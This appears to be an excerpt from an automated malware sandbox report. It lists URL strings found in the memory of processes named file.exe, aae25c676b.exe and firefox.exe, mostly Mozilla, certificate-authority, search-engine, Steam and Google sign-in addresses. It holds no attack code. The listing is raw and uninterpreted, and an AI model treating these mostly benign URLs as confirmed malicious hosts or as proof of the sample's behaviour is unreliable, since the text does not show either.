Source: firefox.exe, 0000001A.00000002.2862601112.000002EE5A160000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2891757977.000002EE5DD26000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2926686487.000002EE64A53000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2929744715.000002EE64D38000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://detectportal.firefox.com/success.txt?ipv4
Source: firefox.exe, 0000001A.00000002.2862601112.000002EE5A160000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2880475164.000002EE5D381000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2929744715.000002EE64D38000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://detectportal.firefox.com/success.txt?ipv6
Source: firefox.exe, 0000001A.00000002.2850784469.000002EE5818A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://exslt.org/common
Source: firefox.exe, 0000001A.00000002.2850784469.000002EE5818A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://exslt.org/math
Source: firefox.exe, 0000001A.00000002.2850784469.000002EE5818A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://exslt.org/sets
Source: firefox.exe, 0000001A.00000002.2899937312.000002EE5E96C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2926686487.000002EE64ABF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://json-schema.org/draft-04/schema#
Source: firefox.exe, 0000001A.00000002.2899937312.000002EE5E96C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2926686487.000002EE64ABF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://json-schema.org/draft-06/schema#
Source: firefox.exe, 0000001A.00000002.2899937312.000002EE5E96C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2891757977.000002EE5DD12000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://json-schema.org/draft-07/schema#
Source: firefox.exe, 0000001A.00000002.2899937312.000002EE5E96C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2894551874.000002EE5DE93000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2926686487.000002EE64ABF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2809099994.000002EE5DE91000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org
Source: firefox.exe, 0000001A.00000002.2913537647.000002EE6001A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2831640577.000002EE5DEDC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2803357818.000002EE60384000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2832627799.000002EE5DEDD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2916133421.000002EE60396000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2903619697.000002EE5ED03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2873106166.000002EE5C918000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2799593917.000002EE5D6E9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2928343018.000002EE64C7A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2913537647.000002EE60096000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2860117948.000002EE59D34000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2922188540.000002EE60698000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2797346914.000002EE5DEDB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2940158821.000002F10003F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2747136565.000002EE67167000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2799802921.000002EE5D2D5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2739831324.000002EE64C7B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2802263143.000002EE606D0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2895552129.000002EE5E008000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2739831324.000002EE64C2F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2902548767.000002EE5EB03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/MPL/2.0/.
Source: file.exe, 00000000.00000003.2214528755.000000000569D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2896845341.000002EE5E675000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2790981889.000002EE5E675000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0
Source: file.exe, 00000000.00000003.2214528755.000000000569D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2896845341.000002EE5E675000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2790981889.000002EE5E675000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: firefox.exe, 0000001A.00000002.2855339754.000002EE58F79000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://poczta.interia.pl/mh/?mailto=%s
Source: firefox.exe, 0000001A.00000002.2869831146.000002EE5C487000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://poczta.interia.pl/mh/?mailto=%sw
Source: firefox.exe, 0000001A.00000002.2903619697.000002EE5ED99000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2767458060.000002EE5ED99000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2928343018.000002EE64C8A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2739831324.000002EE64C8A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://r3.i.lencr.org/0W
Source: firefox.exe, 0000001A.00000002.2903619697.000002EE5ED99000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2767458060.000002EE5ED99000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2928343018.000002EE64C8A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2739831324.000002EE64C8A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://r3.o.lencr.org0
Source: file.exe, 00000000.00000003.2177063879.0000000001000000.00000004.00000020.00020000.00000000.sdmp, aae25c676b.exe, 00000009.00000003.2562025854.0000000000C89000.00000004.00000020.00020000.00000000.sdmp, aae25c676b.exe, 00000009.00000003.2562081008.0000000000C14000.00000004.00000020.00020000.00000000.sdmp, aae25c676b.exe, 00000009.00000003.2562025854.0000000000C82000.00000004.00000020.00020000.00000000.sdmp, aae25c676b.exe, 00000015.00000003.2711982095.000000000181E000.00000004.00000020.00020000.00000000.sdmp, aae25c676b.exe, 00000015.00000002.2730364070.000000000179D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
Source: file.exe, 00000000.00000003.2177063879.0000000001000000.00000004.00000020.00020000.00000000.sdmp, aae25c676b.exe, 00000009.00000003.2562025854.0000000000C89000.00000004.00000020.00020000.00000000.sdmp, aae25c676b.exe, 00000009.00000003.2562081008.0000000000C14000.00000004.00000020.00020000.00000000.sdmp, aae25c676b.exe, 00000009.00000003.2562025854.0000000000C82000.00000004.00000020.00020000.00000000.sdmp, aae25c676b.exe, 00000015.00000003.2711982095.000000000181E000.00000004.00000020.00020000.00000000.sdmp, aae25c676b.exe, 00000015.00000002.2730364070.000000000179D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://store.steampowered.com/privacy_agreement/
Source: file.exe, 00000000.00000003.2177063879.0000000001000000.00000004.00000020.00020000.00000000.sdmp, aae25c676b.exe, 00000009.00000003.2562025854.0000000000C89000.00000004.00000020.00020000.00000000.sdmp, aae25c676b.exe, 00000009.00000003.2562081008.0000000000C14000.00000004.00000020.00020000.00000000.sdmp, aae25c676b.exe, 00000009.00000003.2562025854.0000000000C82000.00000004.00000020.00020000.00000000.sdmp, aae25c676b.exe, 00000015.00000003.2711982095.000000000181E000.00000004.00000020.00020000.00000000.sdmp, aae25c676b.exe, 00000015.00000002.2730364070.000000000179D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://store.steampowered.com/subscriber_agreement/
Source: firefox.exe, 0000001A.00000002.2855339754.000002EE58F79000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://win.mail.ru/cgi-bin/sentmsg?mailto=%s
Source: firefox.exe, 0000001A.00000002.2855339754.000002EE58F79000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://win.mail.ru/cgi-bin/sentmsg?mailto=%sCan
Source: firefox.exe, 0000001A.00000002.2869831146.000002EE5C487000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://win.mail.ru/cgi-bin/sentmsg?mailto=%sy
Source: firefox.exe, 0000001A.00000002.2855339754.000002EE58F79000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.inbox.lv/rfc2368/?value=%s
Source: firefox.exe, 0000001A.00000002.2855339754.000002EE58F79000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.inbox.lv/rfc2368/?value=%shttps://poczta.interia.pl/mh/?mailto=%sScheme
Source: firefox.exe, 0000001A.00000002.2869831146.000002EE5C487000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.inbox.lv/rfc2368/?value=%su
Source: firefox.exe, 0000001A.00000003.2747136565.000002EE67194000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2939387090.000002EE67194000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/2005/app-updatex
Source: firefox.exe, 0000001A.00000002.2899937312.000002EE5E969000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2939387090.000002EE67103000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/2006/browser/search/
Source: firefox.exe, 0000001A.00000002.2872614032.000002EE5C848000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2764466936.000002EE5EF72000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2855339754.000002EE58F79000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2876758672.000002EE5CFC8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2896845341.000002EE5E675000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2790981889.000002EE5E675000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2878148995.000002EE5D103000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2902828832.000002EE5ECDA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2902828832.000002EE5EC4C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2908285442.000002EE5F403000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2899937312.000002EE5E91B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2854573786.000002EE58ED5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2905856189.000002EE5EFDE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2856886597.000002EE59200000.00000002.00000001.00040000.0000001D.sdmp String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul
Source: firefox.exe, 0000001A.00000003.2764466936.000002EE5EFDE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2787747889.000002EE5EFDE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2905856189.000002EE5EFDE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul8
Source: firefox.exe, 0000001A.00000002.2855339754.000002EE58FAB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul:scope
Source: firefox.exe, 0000001A.00000002.2855339754.000002EE58FAB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulchrome://browser/content/places/browser
Source: firefox.exe, 0000001A.00000002.2855339754.000002EE58FAB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulhttp://www.mozilla.org/keymaster/gateke
Source: firefox.exe, 0000001A.00000002.2855339754.000002EE58F24000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulpruneAttachments/
Source: firefox.exe, 0000001A.00000002.2855339754.000002EE58FAB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulsrc=image
Source: file.exe, 00000000.00000003.2177063879.0000000001000000.00000004.00000020.00020000.00000000.sdmp, aae25c676b.exe, 00000009.00000003.2562025854.0000000000C89000.00000004.00000020.00020000.00000000.sdmp, aae25c676b.exe, 00000015.00000003.2711982095.000000000181E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.valvesoftware.com/legal.htm
Source: file.exe, 00000000.00000003.2214528755.000000000569D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2896845341.000002EE5E675000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2790981889.000002EE5E675000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2928343018.000002EE64C8A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2739831324.000002EE64C8A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://x1.c.lencr.org/0
Source: file.exe, 00000000.00000003.2214528755.000000000569D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2896845341.000002EE5E675000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2790981889.000002EE5E675000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2928343018.000002EE64C8A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2739831324.000002EE64C8A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://x1.i.lencr.org/0
Source: firefox.exe, 0000001A.00000002.2929744715.000002EE64D53000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://youtube.com/
Source: firefox.exe, 0000001A.00000002.2862601112.000002EE5A160000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://%LOCALE%.malware-error.mozilla.com/?url=
Source: firefox.exe, 0000001A.00000002.2862601112.000002EE5A160000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://%LOCALE%.phish-error.mozilla.com/?url=
Source: firefox.exe, 0000001A.00000002.2862601112.000002EE5A160000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://%LOCALE%.phish-report.mozilla.com/?url=
Source: firefox.exe, 0000001A.00000003.2681144026.000002EE5CB10000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2687584651.000002EE5CB53000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2855339754.000002EE58F79000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2680534458.000002EE5C900000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2876295890.000002EE5CE00000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000003.2683845506.000002EE5CB32000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2905856189.000002EE5EF4C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ac.duckduckgo.com/ac/
Source: file.exe, 00000000.00000003.2191583956.00000000055E4000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2191486306.00000000055E7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: firefox.exe, 0000001A.00000002.2911859884.000002EE5FF61000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://account.bellmedia.c
Source: firefox.exe, 0000001A.00000002.2855339754.000002EE58FE4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.firefox.com
Source: firefox.exe, 0000001A.00000002.2862601112.000002EE5A160000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2869831146.000002EE5C44A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2872614032.000002EE5C848000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2856566445.000002EE59000000.00000002.00000001.00040000.0000001C.sdmp, firefox.exe, 0000001A.00000002.2899937312.000002EE5E91B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.firefox.com/
Source: firefox.exe, 0000001A.00000002.2862601112.000002EE5A160000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://accounts.firefox.com/settings/clients
Source: firefox.exe, 0000001A.00000002.2927621655.000002EE64BC3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.firefox.comK
Source: firefox.exe, 0000001A.00000002.2928343018.000002EE64C9E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2905856189.000002EE5EFF4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2908285442.000002EE5F447000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2889658691.000002EE5DCDE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2833908400.000000FE5A1D8000.00000004.00000010.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2764466936.000002EE5EFF4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2787747889.000002EE5EFF4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2889658691.000002EE5DCF7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2747136565.000002EE67138000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/v3/signin/challenge/pwd
Source: firefox.exe, 0000001A.00000002.2899937312.000002EE5E96C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2869831146.000002EE5C4DE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2855339754.000002EE58F03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2860117948.000002EE59D34000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2856886597.000002EE59200000.00000002.00000001.00040000.0000001D.sdmp String found in binary or memory: https://addons.mozilla.org
Source: firefox.exe, 0000001A.00000002.2862601112.000002EE5A160000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/%LOCALE%/%APP%/blocked-addon/%addonID%/%addonVersion%/
Source: firefox.exe, 0000001A.00000002.2862601112.000002EE5A160000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/%LOCALE%/firefox/
Source: firefox.exe, 0000001A.00000002.2862601112.000002EE5A160000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/%LOCALE%/firefox/language-tools/
Source: firefox.exe, 0000001A.00000002.2862601112.000002EE5A160000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/%LOCALE%/firefox/search-users/
Source: firefox.exe, 0000001A.00000002.2862601112.000002EE5A160000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/%LOCALE%/firefox/search?q=%TERMS%&platform=%OS%&appver=%VERSION%
Source: firefox.exe, 0000001A.00000002.2862601112.000002EE5A160000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/%LOCALE%/firefox/themes
Source: firefox.exe, 0000001A.00000002.2899937312.000002EE5E96C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/firefox/downloads/file/4040738/cookie_autodelete-3.8.2.xpi
Source: firefox.exe, 0000001A.00000002.2899937312.000002EE5E96C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/firefox/downloads/file/4129240/privacy_badger17-2023.6.23.xpi
Source: firefox.exe, 0000001A.00000002.2899937312.000002EE5E96C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/firefox/downloads/file/4129240/privacy_badger17-2023.6.23.xpi(browserSett
Source: firefox.exe, 0000001A.00000002.2899937312.000002EE5E96C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/firefox/downloads/file/4141092/facebook_container-2.3.11.xpi
Source: firefox.exe, 0000001A.00000002.2899937312.000002EE5E96C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/firefox/downloads/file/4141092/facebook_container-2.3.11.xpichrome://acti
Source: firefox.exe, 0000001A.00000002.2899937312.000002EE5E96C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/user-media/addon_icons/506/506646-64.png?modified=mcrushed
Source: firefox.exe, 0000001A.00000002.2899937312.000002EE5E96C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/user-media/addon_icons/784/784287-64.png?modified=mcrushed
Source: firefox.exe, 0000001A.00000002.2899937312.000002EE5E96C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/user-media/addon_icons/954/954390-64.png?modified=97d4c956
Source: firefox.exe, 0000001A.00000002.2899937312.000002EE5E96C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://addons.mozilla.orgADD_EXTENSION_BUTTON_PRIVACY_3
Source: firefox.exe, 0000001A.00000002.2899937312.000002EE5E96C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2899937312.000002EE5E910000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2899937312.000002EE5E90C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2897777583.000002EE5E77B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2855339754.000002EE58F03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2899937312.000002EE5E908000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2900792770.000002EE5EA4D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2897777583.000002EE5E7FD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ads.stickyadstv.com/firefox-etp
Source: firefox.exe, 0000001A.00000002.2942656154.00001A6DC5600000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2943865255.000021AA81E32000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://allegro.pl/m
Source: firefox.exe, 0000001A.00000002.2869831146.000002EE5C44A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2872614032.000002EE5C848000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2941379352.00000C05D3904000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://amazon.com
Source: firefox.exe, 0000001A.00000002.2929744715.000002EE64D53000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://amazon.com/
Source: firefox.exe, 0000001A.00000002.2862601112.000002EE5A160000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://api.accounts.firefox.com/v1
Source: aae25c676b.exe, 00000015.00000002.2731829717.00000000017EB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://api.steampowered.com/
Source: firefox.exe, 0000001A.00000002.2862601112.000002EE5A160000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://apps.apple.com/app/firefox-private-safe-browser/id989804926
Source: firefox.exe, 0000001A.00000002.2862601112.000002EE5A160000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://apps.apple.com/us/app/firefox-private-network-vpn/id1489407738
Source: firefox.exe, 0000001A.00000002.2913537647.000002EE6005C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2876758672.000002EE5CFC8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aus5.mozilla.org
Source: firefox.exe, 0000001A.00000002.2862601112.000002EE5A160000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://aus5.mozilla.org/update/3/GMP/%VERSION%/%BUILD_ID%/%BUILD_TARGET%/%LOCALE%/%CHANNEL%/%OS_VER
Source: firefox.exe, 0000001A.00000002.2862601112.000002EE5A160000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://aus5.mozilla.org/update/3/SystemAddons/%VERSION%/%BUILD_ID%/%BUILD_TARGET%/%LOCALE%/%CHANNEL
Source: file.exe, 00000000.00000003.2177063879.0000000001000000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://avatars.cloudflare.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
Source: firefox.exe, 0000001A.00000002.2862601112.000002EE5A160000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://blocked.cdn.mozilla.net/
Source: firefox.exe, 0000001A.00000002.2862601112.000002EE5A160000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://blocked.cdn.mozilla.net/%blockID%.html
Source: file.exe, 00000000.00000003.2216206889.00000000055AA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2869831146.000002EE5C44A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2872614032.000002EE5C848000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2850784469.000002EE581AD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696484494400800000.2&ci=1696484494189.
Source: file.exe, 00000000.00000003.2216206889.00000000055AA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2869831146.000002EE5C44A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2872614032.000002EE5C848000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2850784469.000002EE581AD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696484494400800000.1&ci=1696484494189.12791&cta
Source: aae25c676b.exe, 00000015.00000002.2730364070.00000000017D7000.00000004.00000020.00020000.00000000.sdmp, aae25c676b.exe, 00000015.00000002.2731829717.00000000017EB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://broadcast.st.dl.eccdnx.com
Source: firefox.exe, 0000001A.00000002.2885095805.000002EE5D9E3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2746025159.000002EE5D9E3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2873106166.000002EE5C963000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2792367692.000002EE5D9E3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mo
Source: firefox.exe, 0000001A.00000002.2855339754.000002EE58FAB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2856886597.000002EE59200000.00000002.00000001.00040000.0000001D.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1238180
Source: firefox.exe, 0000001A.00000002.2889658691.000002EE5DCD1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1694699#c21
Source: aae25c676b.exe, 00000015.00000002.2730364070.00000000017D7000.00000004.00000020.00020000.00000000.sdmp, aae25c676b.exe, 00000015.00000002.2731829717.00000000017EB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/
Source: file.exe, 00000000.00000003.2191583956.00000000055E4000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2191486306.00000000055E7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: file.exe, 00000000.00000003.2191583956.00000000055E4000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2191486306.00000000055E7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: file.exe, 00000000.00000003.2191583956.00000000055E4000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2191486306.00000000055E7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
